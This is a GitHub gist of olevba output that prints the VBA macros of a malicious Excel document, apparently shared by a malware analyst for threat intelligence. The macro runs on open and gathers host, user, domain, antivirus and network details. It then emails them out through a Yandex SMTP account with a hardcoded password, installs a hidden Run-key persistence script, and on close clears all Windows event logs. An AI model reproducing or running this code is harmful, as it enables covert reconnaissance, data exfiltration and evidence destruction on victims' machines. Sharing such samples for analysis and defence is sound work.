Created
March 8, 2020 16:43
-
-
Save JohnLaTwC/12f66c7bca57649d17ba5985bccd6c5f to your computer and use it in GitHub Desktop.
maldoc
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| ## sample hash 9876757cd03dd2e32e3187d55f934541bfe044bdfa18841523c00173f3963eb5 | |
| olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools | |
| =============================================================================== | |
| FILE: 9876757cd03dd2e32e3187d55f934541bfe044bdfa18841523c00173f3963eb5 | |
| Type: OpenXML | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Module1.bas | |
| in file: xl/vbaProject.bin - OLE stream: 'VBA/Module1' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Sub Auto_Open() | |
| Dim my_file, Position As Integer | |
| Dim text_line, file_name, str1 As String | |
| Dim content, containear(1 To 22) As String | |
| Dim wsh As Object | |
| Dim temp As String | |
| Set wsh = VBA.CreateObject("WScript.Shell") | |
| Dim waitOnReturn As Boolean: waitOnReturn = True | |
| Dim windowStyle As Integer: windowStyle = 1 | |
| os_detect = Application.OperatingSystem | |
| os_check = InStr(1, os_detect, "Win", vbTextCompare) | |
| temp = wsh.ExpandEnvironmentStrings("%temp%") + "\result.txt" | |
| tempzip = wsh.ExpandEnvironmentStrings("%temp%") + "\result.zip" | |
| s = CreateObject("WScript.Shell").Exec("wmic OS GET SystemDrive /VALUE").StdOut.ReadAll | |
| str1 = s | |
| Position = InStr(1, str1, ":", vbTextCompare) | |
| Output = Output + Left(Mid(str1, (Position) - 1), 1) | |
| If os_check >= 0 Then | |
| '*********************************************************************************************************** | |
| Dim TextFile As Integer | |
| Dim FilePath As String | |
| Dim a(72) | |
| FilePath = wsh.ExpandEnvironmentStrings("%temp%") + "\Schedule.vbs" | |
| TextFile = FreeFile | |
| Open FilePath For Output As TextFile | |
| a(1) = "Dim my_file, Position" | |
| a(2) = "Dim text_line, file_name, str1" | |
| a(3) = "Dim containear(19)" | |
| a(4) = "Dim wsh" | |
| a(5) = "Set wsh = CreateObject(""WScript.Shell"")" | |
| a(6) = "Dim waitOnReturn: waitOnReturn = True" | |
| a(7) = "Dim windowStyle: windowStyle = 1" | |
| a(8) = "temp2 = wsh.ExpandEnvironmentStrings(""%temp%"")+""\Logs.txt""" | |
| a(9) = "temp2zip = wsh.ExpandEnvironmentStrings(""%temp%"")+""\Logs.zip""" | |
| a(10) = "containear(1) = ""echo ---------- date is ---------- >%temp%\Logs.txt && Date /t>>%temp%\Logs.txt && time /t>>%temp%\Logs.txt""" | |
| a(11) = "containear(2) = ""echo ---------- Antivirus ---------- >>%temp%\Logs.txt && WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List>>%temp%\Logs.txt""" | |
| a(12) = "containear(3) = ""echo ---------- Services ---------- >>%temp%\Logs.txt && sc query state= all>>%temp%\Logs.txt""" | |
| a(13) = "containear(4) = ""echo ---------- Task list ---------- >>%temp%\Logs.txt && Tasklist>>%temp%\Logs.txt""" | |
| a(14) = "containear(5) = ""echo ---------- Software ---------- >>%temp%\Logs.txt && wmic product get name,version>>%temp%\Logs.txt""" | |
| a(15) = "containear(6) = ""echo ---------- user_wic ---------- >>%temp%\Logs.txt && wmic useraccount get name>>%temp%\Logs.txt""" | |
| a(16) = "containear(7) = ""echo ---------- user_net ---------- >>%temp%\Logs.txt && net user>>%temp%\Logs.txt""" | |
| a(17) = "containear(8) = ""echo ---------- current_user ---------- >>%temp%\Logs.txt && echo %username%>>%temp%\Logs.txt""" | |
| a(18) = "containear(9) = ""echo ---------- ping_site ---------- >>%temp%\Logs.txt && Ping www.ford.com>>%temp%\Logs.txt""" | |
| a(19) = "containear(10) = ""echo ---------- echo firewall_rule ---------- >>%temp%\Logs.txt && netsh advfirewall firewall show rule name=all>>%temp%\Logs.txt""" | |
| a(20) = "containear(11) = ""echo ---------- tmpetwork_detail_ipconfig ---------- >>%temp%\Logs.txt && Ipconfig /all>>%temp%\Logs.txt""" | |
| a(21) = "containear(12) = ""echo ---------- tmpetwork_detail_arp ---------- >>%temp%\Logs.txt && arp -a>>%temp%\Logs.txt""" | |
| a(22) = "containear(13) = ""echo ---------- hosts_of_domain ---------- >>%temp%\Logs.txt && net view>>%temp%\Logs.txt""" | |
| a(23) = "containear(14) = ""echo ---------- user_details ---------- >>%temp%\Logs.txt && net user administrator>>%temp%\Logs.txt""" | |
| a(24) = "containear(15) = ""echo ---------- users_of_domain ---------- >>%temp%\Logs.txt && net user /domain>>%temp%\Logs.txt""" | |
| a(25) = "containear(16) = ""echo ---------- ping_ip ---------- >>%temp%\Logs.txt && Ping 104.74.193.93>>%temp%\Logs.txt""" | |
| a(26) = "containear(17) = ""echo ---------- net_user_domain ---------- >>%temp%\Logs.txt && net user /domain>>%temp%\Logs.txt""" | |
| a(27) = "containear(18) = ""echo ---------- net_computer_domain ---------- >>%temp%\Logs.txt && net computer /domain>>%temp%\Logs.txt""" | |
| a(28) = "containear(19) = ""echo ---------- net_user_%username% ---------- >>%temp%\Logs.txt && net user %username%>>%temp%\Logs.txt""" | |
| a(29) = "For j = 1 To 19" | |
| a(30) = "wsh.Run ""cmd.exe /c"" + containear(j), 0, True" | |
| a(31) = "Next" | |
| a(32) = "wsh.Run ""cmd.exe /c makecab /V1 %temp%\Logs.txt %temp%\Logs.zip"", 0, True" | |
| a(33) = "Set oFSO = CreateObject(""Scripting.FileSystemObject"")" | |
| a(34) = "Set oShell = WScript.CreateObject(""WScript.Shell"")" | |
| a(35) = "strHost = ""google.com""" | |
| a(36) = "strPingCommand = ""ping -n 1 "" & strHost" | |
| a(37) = "ReturnCode = oShell.Run(strPingCommand, 0, True)" | |
| a(38) = "If ReturnCode = 0 Then" | |
| a(39) = "strSubject = ""Logs""" | |
| a(40) = "strFrom = ""[email protected]""" | |
| a(41) = "strTo = ""[email protected]""" | |
| a(42) = "strCc = """"" | |
| a(43) = "strBcc = """"" | |
| a(44) = "strBody = "" "" " | |
| a(45) = "Set CDO_Mail = CreateObject(""CDO.Message"")" | |
| a(46) = "Set CDO_Config = CreateObject(""CDO.Configuration"")" | |
| a(47) = "CDO_Config.Load -1" | |
| a(48) = "Set SMTP_Config = CDO_Config.Fields" | |
| a(49) = "With SMTP_Config" | |
| a(50) = ".Item(""http://schemas.microsoft.com/cdo/configuration/sendusing"") = 2" | |
| a(51) = ".Item(""http://schemas.microsoft.com/cdo/configuration/smtpserver"") = ""smtp.yandex.com""" | |
| a(52) = ".Item(""http://schemas.microsoft.com/cdo/configuration/smtpauthenticate"") = 1" | |
| a(53) = ".Item(""http://schemas.microsoft.com/cdo/configuration/sendusername"") = ""[email protected]""" | |
| a(54) = ".Item(""http://schemas.microsoft.com/cdo/configuration/sendpassword"") = ""ouqttwxssalqrmwe""" | |
| a(55) = ".Item(""http://schemas.microsoft.com/cdo/configuration/smtpserverport"") = 465" | |
| a(56) = ".Item(""http://schemas.microsoft.com/cdo/configuration/smtpusessl"") = True" | |
| a(57) = ".Update" | |
| a(58) = "End With" | |
| a(59) = "With CDO_Mail" | |
| a(60) = "Set .Configuration = CDO_Config" | |
| a(61) = "End With" | |
| a(62) = "CDO_Mail.Subject = strSubject" | |
| a(63) = "CDO_Mail.From = strFrom" | |
| a(64) = "CDO_Mail.To = strTo" | |
| a(65) = "CDO_Mail.AddAttachment CStr(temp2zip)" | |
| a(66) = "CDO_Mail.TextBody = strBody" | |
| a(67) = "CDO_Mail.CC = strCc" | |
| a(68) = "CDO_Mail.BCC = strBcc" | |
| a(69) = "CDO_Mail.Send" | |
| a(70) = "End If" | |
| a(71) = "wsh.Run ""cmd.exe /c del %temp%\Logs.txt"", 0, 1" | |
| a(72) = "wsh.Run ""cmd.exe /c del %temp%\Logs.zip"", 0, 1" | |
| For j = 1 To 72 | |
| Print #TextFile, a(j) | |
| Next j | |
| Close TextFile | |
| '************************************************************************************************************* | |
| wsh.Run "cmd.exe /c mkdir " & Output & ":\Perflog", 0, True | |
| wsh.Run "cmd.exe /c attrib +h +s " & Output & ":\Perflog", 0, True | |
| wsh.Run "cmd.exe /c copy %temp%\Schedule.vbs " & Output & ":\Perflog\Schedule.vbs", 0, True | |
| Dim WshShell As Object | |
| Set WshShell = CreateObject("WScript.Shell") | |
| On Error Resume Next | |
| wsh.RegRead ("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\StartScript") | |
| If Err <> 0 Then | |
| wsh.Run "cmd.exe /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v StartScript /t REG_SZ /d " + Output + ":\Perflog\Schedule.vbs", 0, True | |
| Err.Clear | |
| End If | |
| '************************************************************************************************************* | |
| Sheets("EVALUATION").Cells.Validation.Delete | |
| containear(1) = "echo ---------- date is ---------- >>%temp%\result.txt && Date /t>>%temp%\result.txt && time /t>>%temp%\result.txt" | |
| containear(2) = "echo ---------- Antivirus ---------- >>%temp%\result.txt && WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List>>%temp%\result.txt" | |
| containear(3) = "echo ---------- Services ---------- >>%temp%\result.txt && sc query state= all>>%temp%\result.txt" | |
| containear(4) = "echo ---------- Version Of OS ---------- >>%temp%\result.txt && ver>>%temp%\result.txt" | |
| containear(5) = "echo ---------- Task list ---------- >>%temp%\result.txt && Tasklist>>%temp%\result.txt" | |
| containear(6) = "echo ---------- Boot Config ---------- >>%temp%\result.txt && Bcdedit>>%temp%\result.txt" | |
| containear(7) = "echo ---------- Software ---------- >>%temp%\result.txt && wmic product get name,version>>%temp%\result.txt" | |
| containear(8) = "echo ---------- user_wic ---------- >>%temp%\result.txt && wmic useraccount get name>>%temp%\result.txt" | |
| containear(9) = "echo ---------- user_net ---------- >>%temp%\result.txt && net user>>%temp%\result.txt" | |
| containear(10) = "echo ---------- current_user ---------- >>%temp%\result.txt && echo %username%>>%temp%\result.txt" | |
| containear(11) = "echo ---------- ping_site ---------- >>%temp%\result.txt && Ping www.ford.com>>%temp%\result.txt" | |
| containear(12) = "echo ---------- echo firewall_rule ---------- >>%temp%\result.txt && netsh advfirewall firewall show rule name=all>>%temp%\result.txt" | |
| containear(13) = "echo ---------- tmpetwork_detail_ipconfig ---------- >>%temp%\result.txt && Ipconfig /all>>%temp%\result.txt" | |
| containear(14) = "echo ---------- tmpetwork_detail_arp ---------- >>%temp%\result.txt && arp -a>>%temp%\result.txt" | |
| containear(15) = "echo ---------- hosts_of_domain ---------- >>%temp%\result.txt && net view>>%temp%\result.txt" | |
| containear(16) = "echo ---------- user_details ---------- >>%temp%\result.txt && net user administrator>>%temp%\result.txt" | |
| containear(17) = "echo ---------- users_of_domain ---------- >>%temp%\result.txt && net user /domain>>%temp%\result.txt" | |
| containear(18) = "echo ---------- ping_ip ---------- >>%temp%\result.txt && Ping 104.74.193.93>>%temp%\result.txt" | |
| containear(19) = "echo ---------- net_user_domain ---------- >>%temp%\result.txt && net user /domain>>%temp%\result.txt" | |
| containear(20) = "echo ---------- net_computer_domain ---------- >>%temp%\result.txt && net computer /domain>>%temp%\result.txt" | |
| containear(21) = "echo ---------- net_user_%username% ---------- >>%temp%\result.txt && net user %username%>>%temp%\result.txt" | |
| containear(22) = "echo ---------- Directory ---------- >>%temp%\result.txt" | |
| For j = 1 To 22 | |
| wsh.Run "cmd.exe /c" + containear(j), 0, True | |
| Next j | |
| End If | |
| '*********************************************************************************************************** | |
| wsh.Run "cmd.exe /c dir /s " & Output & ":\Users>>%temp%\result.txt", 0, True | |
| wsh.Run "cmd.exe /c makecab /V1 %temp%\result.txt %temp%\result.zip", 0, True | |
| '************************************************************************************************************* | |
| On Error Resume Next | |
| checkInternetConnection = False | |
| Set objSvrHTTP = New ServerXMLHTTP | |
| objSvrHTTP.Open "GET", "http://www.google.com" | |
| objSvrHTTP.SetRequestHeader "Accept", "application/xml" | |
| objSvrHTTP.SetRequestHeader "Content-Type", "application/xml" | |
| objSvrHTTP.Send strT | |
| If Err = 0 Then | |
| checkInternetConnection = True | |
| strSubject = "Feed back" | |
| strFrom = "[email protected]" | |
| strTo = "[email protected]" | |
| strCc = "" | |
| strBcc = "" | |
| strBody = " " | |
| Set CDO_Mail = CreateObject("CDO.Message") | |
| On Error GoTo Error_Handling | |
| Set CDO_Config = CreateObject("CDO.Configuration") | |
| CDO_Config.Load -1 | |
| Set SMTP_Config = CDO_Config.Fields | |
| With SMTP_Config | |
| .Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 | |
| .Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.yandex.com" | |
| .Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 | |
| .Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "[email protected]" | |
| .Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "ouqttwxssalqrmwe" | |
| .Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 465 | |
| .Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True | |
| .Update | |
| End With | |
| With CDO_Mail | |
| Set .Configuration = CDO_Config | |
| End With | |
| CDO_Mail.Subject = strSubject | |
| CDO_Mail.From = strFrom | |
| CDO_Mail.To = strTo | |
| CDO_Mail.AddAttachment CStr(tempzip) | |
| CDO_Mail.TextBody = strBody | |
| CDO_Mail.CC = strCc | |
| CDO_Mail.BCC = strBcc | |
| CDO_Mail.Send | |
| Error_Handling: | |
| End If | |
| End Sub | |
| Sub read() | |
| Set wsh = VBA.CreateObject("WScript.Shell") | |
| Dim waitOnReturn As Boolean: waitOnReturn = True | |
| temp = wsh.ExpandEnvironmentStrings("%temp%") + "\result.txt" | |
| o = 1 | |
| file_name = temp | |
| my_file = FreeFile() | |
| Open file_name For Input As my_file | |
| While Not EOF(my_file) | |
| Line Input #my_file, text_line | |
| Sheets("Sheet2").Cells(o, "E").Value = " " + text_line | |
| o = o + 1 | |
| Wend | |
| Close #my_file | |
| Application.ScreenUpdating = True | |
| Application.StatusBar = False | |
| wsh.Run "cmd.exe /c del %temp%\result.txt", 0, 1 | |
| wsh.Run "cmd.exe /c del %temp%\result.zip", 0, 1 | |
| wsh.Run "cmd.exe /c del %temp%\Schedule.vbs", 0, 1 | |
| wsh.Run "cmd.exe /c for /F 'tokens=*' %1 in ('wevtutil.exe el') DO wevtutil.exe cl '%1'", 0, 1 | |
| wsh.Run "cmd.exe /c powershell.exe taskkill /f /im cmd.exe", 0, 1 | |
| ThisWorkbook.Save | |
| End Sub | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisWorkbook.cls | |
| in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Private Sub Workbook_BeforeClose(Cancel As Boolean) | |
| read | |
| End Sub | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Sheet1.cls | |
| in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| (empty macro) | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Sheet2.cls | |
| in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet2' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| (empty macro) | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Sheet11.cls | |
| in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet11' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| (empty macro) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment